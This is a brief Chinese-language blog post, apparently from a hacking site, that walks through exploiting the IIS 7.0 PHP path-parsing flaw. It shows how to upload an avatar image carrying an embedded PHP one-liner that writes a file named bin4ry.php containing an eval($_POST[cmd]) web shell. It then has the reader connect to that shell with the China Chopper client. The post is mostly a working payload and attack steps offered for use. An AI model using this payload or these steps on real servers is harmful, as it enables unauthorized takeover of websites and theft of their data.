IIS7.0 php错误文件解析漏洞利用实例
得到www.webshell.cc(仅为举例,非真实)web服务为IIS7.0
www.webshell.cc/robots.txt后面加上/任意字符.php成功解析为php
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用菜刀连接
作者 nios
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3374.html